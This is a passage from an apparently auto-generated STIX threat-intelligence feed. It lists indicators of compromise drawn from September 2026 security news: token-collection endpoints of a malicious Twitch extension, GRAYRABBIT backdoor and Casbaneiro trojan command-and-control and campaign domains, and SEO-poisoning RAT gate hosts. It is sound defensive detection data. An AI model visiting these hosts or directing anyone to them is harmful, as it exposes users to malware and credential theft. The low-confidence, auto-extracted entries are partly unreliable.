News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cf1a5c82-7d17-454d-960e-870674af8e98","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: thebeholderbotapi.vercel.app","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ssioned backup token-collection endpoint Privacy-policy URL thebeholderbotapi[.]vercel[.]app/twitch-conf Privacy-policy host cited in the investigat","pattern":"[domain-name:value = 'thebeholderbotapi.vercel.app']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--524df4e2-ae51-4792-8096-a4931e76cb16","created":"2026-09-14T13:50:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: thebeholder-proxy.deno.dev","description":"Seen in \"Malicious Twitch Extension Exposes OAuth Tokens of 30,000 Chrome and Firefox Users\" (Cyber Security News). Context: ed token-collection endpoint Historical collection endpoint thebeholder-proxy[.]deno[.]dev/set-token Decommissioned backup token-collection endpoi","pattern":"[domain-name:value = 'thebeholder-proxy.deno.dev']","pattern_type":"stix","valid_from":"2026-09-14T13:50:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/malicious-twitch-extension/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ab5bc375-21fc-4c5c-9283-a33fee35a857","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: mail.uaiubifas.top","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: Staging server hosted on Alibaba Cloud in Hong Kong Domain mail.uaiubifas.top GRAYRABBIT command-and-control domain using port 443 SHA-25","pattern":"[domain-name:value = 'mail.uaiubifas.top']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3011aa48-5848-4d77-8548-597e1ae6772f","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: noht1ng.top","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: thod protocol link used to trigger the exploit chain Domain noht1ng.top Exploit-page hosting domain IP address 8.218.50.207 Staging","pattern":"[domain-name:value = 'noht1ng.top']","pattern_type":"stix","valid_from":"2026-09-14T13:01:36.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3b8ad026-4cd3-4d21-ab3f-93990040d0f4","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: 115.201.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 115[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 181[.]202[.]178[","pattern":"[domain-name:value = '115.201.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9a3e1f15-c7be-4b31-89a8-36f7d93e61ee","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: 116.181.62.50.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 116[.]181[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain 48[.]178[.]169[.","pattern":"[domain-name:value = '116.181.62.50.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4c16b602-e29d-436e-82a3-b91e6597eafd","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: 128.200.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: a0c2f5a2cf5ca8f955ee3375e3ca66a5dc52b HTA downloader Domain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 13[.]189[.]202[.","pattern":"[domain-name:value = '128.200.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5e9a60ce-2cb3-46b2-ab9e-f87511d9e6de","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: 129.202.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 129[.]202[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 76[.]180[.]62[.]","pattern":"[domain-name:value = '129.202.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ad75353e-3323-4015-a053-9a4d972622db","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: 13.189.202.64.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 13[.]189[.]202[.]64[.]host[.]secureserver[.]net Campaign infrastructure Domain 116[.]181[.]62[.","pattern":"[domain-name:value = '13.189.202.64.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--eb6087c6-3a86-4e27-a9d7-d573a5a477f6","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: 135.201.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 135[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 85[.]182[.]62[.]","pattern":"[domain-name:value = '135.201.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--aac318dc-d831-46e5-bb3f-efdddb562eb8","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: 162.201.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 162[.]201[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 129[.]202[.]178[","pattern":"[domain-name:value = '162.201.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f32d7976-e647-4e5f-8b88-8c6fb4d5023e","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: 181.202.178.68.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 181[.]202[.]178[.]68[.]host[.]secureserver[.]net Campaign infrastructure Domain 135[.]201[.]178[","pattern":"[domain-name:value = '181.202.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--34f5af78-ae86-41f5-ac02-d516eb85e50b","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: 48.178.169.192.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 48[.]178[.]169[.]192[.]host[.]secureserver[.]net Campaign infrastructure Domain 115[.]201[.]178[","pattern":"[domain-name:value = '48.178.169.192.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--15e8a8a5-6405-4faa-85d3-f87d1bc16d37","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: 76.180.62.50.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 76[.]180[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain gexwalltool[.]co","pattern":"[domain-name:value = '76.180.62.50.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3ef95287-29b1-4ef2-a780-c96a8fd380bc","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: 85.182.62.50.host.secureserver.net","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain 85[.]182[.]62[.]50[.]host[.]secureserver[.]net Campaign infrastructure Domain 162[.]201[.]178[","pattern":"[domain-name:value = '85.182.62.50.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--342751ce-71bf-41c3-b9ce-8def1913521d","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: gexwalltool.com","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: [.]host[.]secureserver[.]net Campaign infrastructure Domain gexwalltool[.]com Campaign infrastructure Domain x-wolverine[.]servebbs[.]c","pattern":"[domain-name:value = 'gexwalltool.com']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0f580d82-167d-4847-94fe-10cadfd0a029","created":"2026-09-14T08:42:16.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: x-wolverine.servebbs.com","description":"Seen in \"Hackers Deploy Casbaneiro Banking Trojan That Activates When Victims Open Bank Websites\" (Cyber Security News). Context: ure Domain gexwalltool[.]com Campaign infrastructure Domain x-wolverine[.]servebbs[.]com Campaign infrastructure IP address 72[.]167[.]48[.]63 C","pattern":"[domain-name:value = 'x-wolverine.servebbs.com']","pattern_type":"stix","valid_from":"2026-09-14T08:42:16.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ee845b35-ff4a-494b-b0e5-278536cd079f","created":"2026-09-14T08:09:26.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: noht1ng.top","description":"Seen in \"China-Linked Hackers Exploit Sogou One-Click RCE to Deploy GRAYRABBIT Backdoor\" (GBHackers). Context: ryption RC4-encrypted communications Exploit-hosting domain noht1ng[.]top Staging-server IP address 8.218.50[.]207 Staging-server p","pattern":"[domain-name:value = 'noht1ng.top']","pattern_type":"stix","valid_from":"2026-09-14T08:09:26.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/grayrabbit-backdoor/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4aa18d34-dc74-4edb-9f52-5bae1ef2bde9","created":"2026-09-14T08:09:26.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: uaiubifas.top","description":"Seen in \"China-Linked Hackers Exploit Sogou One-Click RCE to Deploy GRAYRABBIT Backdoor\" (GBHackers). Context: re. In this campaign, the payload reportedly contacted mail.uaiubifas[.]top over raw TCP port 443 and encrypted fixed-size 4,096-byte","pattern":"[domain-name:value = 'uaiubifas.top']","pattern_type":"stix","valid_from":"2026-09-14T08:09:26.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/grayrabbit-backdoor/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fc3f2b31-5542-47ae-95c7-debe628477b5","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: achievershelf.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: to CL-CRI-1171 activity and subsequently taken down Domain achievershelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[","pattern":"[domain-name:value = 'achievershelf.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d36dc86e-68bd-42c8-9a2d-6c9d65c2ef27","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: activitykitty.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: CL-CRI-1171 gate and landing infrastructure Domain connect.activitykitty[.]xyz ; connect.apparatustaste[.]xyz ; connect.armcard[.]xyz ;","pattern":"[domain-name:value = 'activitykitty.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8081129f-1f75-4e1c-8bcd-4e19183870bc","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: activitymeal.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: and subsequently taken down Domain achievershelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[","pattern":"[domain-name:value = 'activitymeal.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c46e0a31-69e7-4b24-9833-11927bce25ae","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: additionplot.cfd","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: down Domain achievershelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementju","pattern":"[domain-name:value = 'additionplot.cfd']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d2bfc9d1-05b0-422d-a63a-893c77f22356","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: adviceturn.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: shelf[.]space ; activitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airpl","pattern":"[domain-name:value = 'adviceturn.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7cf65f93-273b-4768-b201-27cd42a66ecf","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: afternoonscrew.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ivitymeal[.]space ; additionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.","pattern":"[domain-name:value = 'afternoonscrew.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8a2e5083-379d-419d-81db-38c7d0230bbb","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: agreementjuice.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ionplot[.]cfd ; adviceturn[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ;","pattern":"[domain-name:value = 'agreementjuice.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f5b415dc-7a5f-42a6-8338-5de137bf1888","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: airplaneiron.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: n[.]xyz ; afternoonscrew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ;","pattern":"[domain-name:value = 'airplaneiron.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--63f94666-e10e-47cf-8857-896e7ae93a2c","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: airtwig.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: rew[.]space ; agreementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[","pattern":"[domain-name:value = 'airtwig.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ca7cef1e-de86-49e2-abee-1fa90a048c0a","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: amazingshield.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: a.js Stage-three Node.js Insomnia RAT agent URL hxxp[:]//aa.amazingshield[.]xyz/33244556546.py Stage-three Python Insomnia RAT agent URL","pattern":"[domain-name:value = 'amazingshield.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6ba346df-e45c-49d6-8cf8-9bfb28c0018f","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: amountfuel.icu","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: reementjuice[.]space ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[.]xyz CL-CRI-1171 g","pattern":"[domain-name:value = 'amountfuel.icu']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--37e791ce-8564-419c-ab1b-97793a3f4fe0","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: animalrecord.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: e ; airplaneiron[.]xyz ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[.]xyz CL-CRI-1171 gate and landing infra","pattern":"[domain-name:value = 'animalrecord.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1108d233-b6b0-4a8e-9cf3-59435cb3fbf2","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: animalview.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: o OfferLoader payload handoff and second-stage hosts Domain animalview[.]xyz ; trickflag[.]info ; suitstraw[.]info ; connect.fuelleg[.","pattern":"[domain-name:value = 'animalview.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9a221992-c53b-4e8c-9b28-4c56946a982a","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: apparatustaste.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: infrastructure Domain connect.activitykitty[.]xyz ; connect.apparatustaste[.]xyz ; connect.armcard[.]xyz ; connect.badgeterritory[.]xyz ;","pattern":"[domain-name:value = 'apparatustaste.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e3f8da48-2e5f-4301-9d40-0d4eef51f5c2","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: apparatustruck.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: z ; airtwig[.]xyz ; amountfuel[.]icu ; animalrecord[.]xyz ; apparatustruck[.]xyz CL-CRI-1171 gate and landing infrastructure Domain appare","pattern":"[domain-name:value = 'apparatustruck.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4a66030a-2bfc-4755-995d-f058cbc2c063","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: apparelplate.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ck[.]xyz CL-CRI-1171 gate and landing infrastructure Domain apparelplate[.]space ; archairport[.]xyz ; authoritykittens[.]info ; babyvein[","pattern":"[domain-name:value = 'apparelplate.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 